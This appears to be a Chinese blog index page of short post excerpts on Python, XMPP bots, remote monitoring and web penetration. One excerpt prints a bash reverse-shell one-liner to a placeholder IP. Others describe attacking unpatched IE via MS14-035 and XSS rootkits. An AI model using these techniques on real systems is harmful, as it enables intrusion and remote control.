现在的位置: 首页>

Pandion plugin

2014-07-29 03:07:12 学习   暂无评论
纯javascript和网页开发, 源代码在 src Pandion http://www.pandion.be/download/ Pandion 插件开发 http://ymt.googlecode.com/files/pandion_plug-in_specification_1.3.pdf 设定 通过settings/brand.xml 可设定以下信息 softwarename softwarenamesafe 用于文件和目

利用“MS14-035”,对IE浏览器进行恶意攻击

2014-07-29 03:07:25 学习   暂无评论
这个漏洞可以导致IE浏览器崩溃,涉及的版本有 ie8,9,10,微软在14年6月10日发布了更新补丁,所以现在只能攻击没有更新至今年6月10号的IE浏览器了。详情看这里: http://www.exploit-db.com/exploits/33860/ 如上面介绍,利用这个漏洞,我们需要一段html代码。下面我在本机演示下局域网攻击吧,靶机是安装在虚拟机中的win7_sp1-ie9: 首先修改本机 /var/www 目录下的 index.html 为以下内容: &

深掘XSS漏洞场景之XSS Rootkit

2014-07-29 03:07:54 学习   暂无评论
0×00 前言 众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型分为两种持久型和非持久型: 1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。 2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客可以用XSS内容经正常功能进入数据库持久保存。 一般持久型XSS漏洞比非持久型XSS漏洞风险等级高,从漏洞的本质上来说这是没错的,但漏洞的利用

Python中理解exec()用法

2014-07-29 03:07:00 学习   暂无评论
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句。下面是一个简单的例子。 >>> exec 'print "Hello World"' Hello World 注意例子中exec语句的用法和eval_r(), execfile()是不一样的. exec是一个语句(就象print或while), 而eval_r()和execf

Web渗透中的反弹Shell与端口转发的奇淫技巧

2014-07-29 03:07:02 学习   暂无评论
0×00 前言   在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.   0×01 反弹shell   1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口 bash -i >& /dev/tcp/x.x.x.x/2333 0>&a

python gtalk机器人 - 开源中国社区

2014-07-27 10:07:17 学习   暂无评论
ython语言: python gtalk机器人 # coding: utf-8 # # 这是根据xmpp封装的Jabber聊天机器人类, 可以通过继承,重载部分函数来自定义功能. # Jabber ID(JID): 比如gamcat@gmail.com   import xmpp   class Bot:     """ Jabber Bot Base Cl

Android之基于XMPP协议即时通讯软件

2014-07-27 03:07:05 学习   暂无评论
文章开头,先打一下广告咯,今年误打误撞,侥幸进入2013CSDN博客之星候选,目前排名已经有点不堪入目,所以,谨希望广大基友们动动手指,轻轻的点击两下,给我投出宝贵的一票,求宣传,求扩散,非常感谢,感激涕零,总之是语无伦次的感谢!!! 投票地址请移驾:http://vote.blog.csdn.net/blogstaritem/blogstar2013/weidi1989     源码地址:http://download.csdn.net/deta

简单的远程电脑监控[0.1.0版本] - 优读技术

2014-07-25 04:07:12 学习   暂无评论
简单的远程电脑监控。 已经实现如下功能: 消息类型 1获取计算机名 11获取进程列表 12结束进程 21弹出对话框 31锁定计算机 41列出目录 51执行程序 61退出程序  

用python实现ping的源代码

2014-07-25 03:07:21 学习   暂无评论
几个月前看到某网游公司的服务端监控程序有一个功能,从服务器反PING各客户端,进而了解各客户端到服务端的PING高低,以及客户端大致的区域分布情况,于是有想法自己用PYTHON也写一个。今天网上查到一个PYTHON实现PING的源码,看了一下,很不错。 重点是发现别人写的代码格式很优美,我的相比简直太差了。哎,努力学习。   先转贴别人的源码,这几天有空后再根据这个改进,逐步达到我的设计目标。 代码我在python 2.6 elicp

使用pyinstaller打包python为exe文件

2014-07-25 03:07:09 学习   暂无评论
使用pyinstaller打包python为exe文件 最近用python的tkinter写了个windows界面的工具,用来对软件版本发布的自动化,之前发布版本是由PHP的同事完成,又是手动上传文件到ftp,又是修改数据库,php代码等这么多繁琐的步骤。所以决定用python写了个windows的应用,因为版本发布可能会交给运营的同事完成,所以用tkinter写了个界面,顺便转换成exe的文件,之前是用py2exe,觉得不好用,搜索到了pyinstaller,还不错,使用简单,且打包成ex